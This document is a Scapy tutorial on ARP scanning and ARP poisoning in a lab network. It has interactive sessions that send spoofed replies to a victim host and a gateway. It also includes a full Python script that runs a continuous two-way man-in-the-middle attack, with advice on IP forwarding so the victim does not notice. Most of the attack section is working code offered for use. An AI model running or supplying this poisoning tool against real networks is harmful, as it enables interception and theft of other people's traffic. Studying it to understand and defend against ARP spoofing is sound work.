Scapy interactive ARP scanning and attacks
1) Simple implementation (a more complete implementation would work out the address range of the host's own IP automatically, or loop over a defined set of IP addresses):
>>arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24'))
Begin emission:
***Finished to send 256 packets.
................................................^C (a more complete implementation would define when to stop)
Received 51 packets, got 3 answers, remaining 253 packets
>> print(arp2[0].show())
0000 Ether / ARP who has 192.168.80.1 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:c0:00:08 says 192.168.80.1 / Padding
0001 Ether / ARP who has 192.168.80.2 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:ef:49:1f says 192.168.80.2 / Padding
0002 Ether / ARP who has 192.168.80.251 says 192.168.80.250 ==> Ether / ARP is at 00:0c:29:21:fd:03 says 192.168.80.251 / Padding
2) Break the reply from 192.168.80.251 down into its fields:
>> print(arp2[0].res[2][1].fields) (a more complete implementation would extract the fields automatically)
{'src': '00:0c:29:21:fd:03', 'dst': '00:0c:29:e2:bb:15', 'type': 2054}
>> print(arp2[0].res[2][1].show()) (a more complete implementation would extract the fields automatically)
###[ Ethernet ]###
dst= 00:0c:29:e2:bb:15
src= 00:0c:29:21:fd:03
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:21:fd:03
psrc= 192.168.80.251
hwdst= 00:0c:29:e2:bb:15
pdst= 192.168.80.250
###[ Padding ]###
load= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
None
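The three parenthetical notes above (derive the range from the host's own address, decide when to stop, extract the fields automatically) are what the following script fills in. It is an added example, not code from the original post: the /24 prefix is an assumption carried over from the page's scan, the interface and source address come from Scapy's default-route lookup `conf.route.route("0.0.0.0")`, and `srp()` is given a `timeout=` so the sweep ends on its own instead of with ^C. The live sweep needs Scapy and root; the helpers that reduce the answers to an IP-to-MAC table run without either, and `sample_answers()` is a constructed stand-in for the page's three replies.

```python
"""ARP sweep with Scapy: target range from the host's own address, a timeout
instead of ^C, and psrc/hwsrc pulled out of every answer."""
import ipaddress
from dataclasses import dataclass


def network_for(ip, prefixlen=24):
    """Network an address belongs to, e.g. 192.168.80.250 -> '192.168.80.0/24'.
    The /24 default is an assumption taken from the page's scan; pass the
    real prefix length if the LAN is not a /24."""
    return str(ipaddress.ip_interface(f"{ip}/{prefixlen}").network)


def hosts_from_answers(answers):
    """Reduce srp()'s answered list of (sent, received) pairs to {ip: mac}.
    Only the ARP psrc/hwsrc of each reply are consulted, which is exactly
    what a host's ARP cache would record from it."""
    table = {}
    for _sent, rcv in answers:
        table[rcv.psrc] = rcv.hwsrc.lower()
    return table


def arp_scan(net=None, timeout=2, iface=None):
    """Live sweep. Needs Scapy and raw-socket privileges (root), so the
    import is deferred and this function is never exercised offline."""
    from scapy.all import ARP, Ether, conf, srp
    if net is None:
        # Default-route lookup returns (iface, source ip, gateway).
        route_iface, my_ip, _gw = conf.route.route("0.0.0.0")
        iface = iface or route_iface
        net = network_for(my_ip)
    request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=net)
    # timeout= is what the page's ^C stood in for; verbose=0 silences the dots.
    ans, _unans = srp(request, timeout=timeout, iface=iface, verbose=0)
    return hosts_from_answers(ans)


@dataclass
class ArpReply:
    """Just enough of a Scapy ARP layer to exercise hosts_from_answers() offline."""
    psrc: str
    hwsrc: str


def sample_answers():
    """Constructed stand-in for srp()'s answered list, mirroring the page's three replies."""
    return [
        (None, ArpReply("192.168.80.1", "00:50:56:c0:00:08")),
        (None, ArpReply("192.168.80.2", "00:50:56:EF:49:1F")),
        (None, ArpReply("192.168.80.251", "00:0c:29:21:fd:03")),
    ]


if __name__ == "__main__":
    found = arp_scan()
    for ip in sorted(found, key=ipaddress.ip_address):
        print(f"{ip:<16} {found[ip]}")
```

Run it as root on the lab network and it prints the same IP/MAC pairs the interactive session produced, without the manual `res[2][1]` indexing.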
2. ARP spoof (ARP poisoning)
1) Poison host 192.168.80.251 (tell it that the gateway's MAC is the attacker's MAC):
192.168.80.1, MAC 00:50:56:c0:00:08 (gateway)
192.168.80.250, MAC 00:0c:29:e2:bb:15 (attacker)
192.168.80.251, MAC 00:0c:29:21:fd:03 (victim)
>>arp3=(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
>> arp3.show()
###[ Ethernet ]###
dst= 00:0c:29:21:fd:03
src= 00:0c:29:e2:bb:15
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.1
hwdst= 00:0c:29:21:fd:03
pdst= 192.168.80.251
>>arp3=srp(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
Begin emission:
Finished to send 1 packets.
....^C
Received 4 packets, got 0 answers, remaining 1 packets
Because ARP is a layer-2 frame, it is delivered as long as the destination MAC is right. When 192.168.80.251 receives this ARP reply it reads only hwsrc='00:0c:29:e2:bb:15' and psrc='192.168.80.1' from the ARP payload and writes that pair into its ARP cache, even though it never asked for it. Note that srp() keeps waiting for an answer that an is-at reply never gets, which is why the session had to be interrupted with ^C; sendp() is the right call for an unsolicited reply. The poisoned entry also ages out of the cache, so the reply has to be repeated to keep the victim pointed at the attacker.
Screenshots:
ARP cache of 192.168.80.251 before poisoning:
ARP cache of 192.168.80.251 after poisoning:
3) Poison the gateway (tell gateway 192.168.80.1 that host 192.168.80.251 is at the attacker's MAC):
>>arp4=(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
>> arp4.show()
###[ Ethernet ]###
dst= 00:50:56:c0:00:08
src= 00:0c:29:e2:bb:15
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.251
hwdst= 00:50:56:c0:00:08
pdst= 192.168.80.1
>>arp4=srp(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
Begin emission:
Finished to send 1 packets.
........^C
Received 8 packets, got 0 answers, remaining 1 packets
Likewise, once 192.168.80.1 receives this reply it takes only hwsrc='00:0c:29:e2:bb:15' and psrc='192.168.80.251' from the ARP payload into its cache. With both caches poisoned, traffic in both directions between 192.168.80.251 and the gateway is now addressed to the attacker's interface; unless the attacker forwards it (IP forwarding enabled), the victim simply loses connectivity, which is the quickest way for the attack to be noticed.
Screenshots:
ARP cache of 192.168.80.1 before poisoning:
ARP cache of 192.168.80.1 after poisoning:
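The two one-shot replies above (arp3 toward the victim, arp4 toward the gateway) become a usable man-in-the-middle only when they are re-sent as caches age out and undone when the attack stops. The script below is an added example, not code from the original post. It uses the page's lab addresses as module constants (change them for your own network), sends with sendp() rather than srp() because no answer is expected, and on ^C sends the true MACs back so both caches recover. cache_after() is a small model of the behaviour the page describes, a receiver copying hwsrc/psrc straight into its cache, so the effect of each frame can be checked without Scapy; the live loop needs Scapy, root, and IP forwarding on the attacker (on Linux, sysctl -w net.ipv4.ip_forward=1) so the victim keeps its connectivity.

```python
"""Bidirectional ARP poisoning with Scapy: the page's arp3/arp4 replies,
re-sent on an interval (caches expire) and undone with the true MACs on ^C."""
import time

# Addresses from the page's lab; change them for your own network.
GATEWAY_IP, GATEWAY_MAC = "192.168.80.1", "00:50:56:c0:00:08"
ATTACKER_MAC = "00:0c:29:e2:bb:15"
VICTIM_IP, VICTIM_MAC = "192.168.80.251", "00:0c:29:21:fd:03"


def reply_fields(dst_mac, hwsrc, psrc, pdst):
    """Field set of one op=2 (is-at) reply as a plain dict so it can be checked
    without Scapy. Ether.src is left to Scapy, which fills in the interface MAC."""
    return {"dst": dst_mac, "hwsrc": hwsrc, "psrc": psrc, "hwdst": dst_mac, "pdst": pdst}


def poison_frames(attacker_mac=ATTACKER_MAC):
    """The page's two replies: the victim is told the gateway is at attacker_mac
    (arp3) and the gateway is told the victim is at attacker_mac (arp4)."""
    return [
        reply_fields(VICTIM_MAC, attacker_mac, GATEWAY_IP, VICTIM_IP),
        reply_fields(GATEWAY_MAC, attacker_mac, VICTIM_IP, GATEWAY_IP),
    ]


def restore_frames():
    """The same two replies carrying the real MACs, to repair both caches on exit."""
    return [
        reply_fields(VICTIM_MAC, GATEWAY_MAC, GATEWAY_IP, VICTIM_IP),
        reply_fields(GATEWAY_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_IP),
    ]


def cache_after(cache, fields):
    """Model of what the receiver does with a reply, as the page describes it:
    the ARP hwsrc/psrc pair is written into the cache and nothing else is checked.
    Returns a new dict so the caller's 'before' state is kept for comparison."""
    updated = dict(cache)
    updated[fields["psrc"]] = fields["hwsrc"]
    return updated


def build(fields):
    """Turn a field dict into the Ether/ARP packet the page builds by hand."""
    from scapy.all import ARP, Ether
    return Ether(dst=fields["dst"]) / ARP(op=2, hwsrc=fields["hwsrc"], psrc=fields["psrc"],
                                          hwdst=fields["hwdst"], pdst=fields["pdst"])


def poison(iface=None, interval=2.0):
    """Live attack: needs Scapy, root, and IP forwarding on the attacker so the
    victim keeps connectivity (Linux: sysctl -w net.ipv4.ip_forward=1)."""
    from scapy.all import sendp
    frames = [build(f) for f in poison_frames()]
    try:
        while True:
            sendp(frames, iface=iface, verbose=0)  # sendp, not srp: no answer is expected
            time.sleep(interval)
    except KeyboardInterrupt:
        # Send the truth a few times so both caches converge before we leave.
        sendp([build(f) for f in restore_frames()], iface=iface, count=3, inter=0.5, verbose=0)


if __name__ == "__main__":
    poison()
```

The restore step matters as much as the attack: without it the victim and gateway keep the attacker's MAC until their entries time out, and the outage it causes is exactly the symptom that gets ARP poisoning noticed.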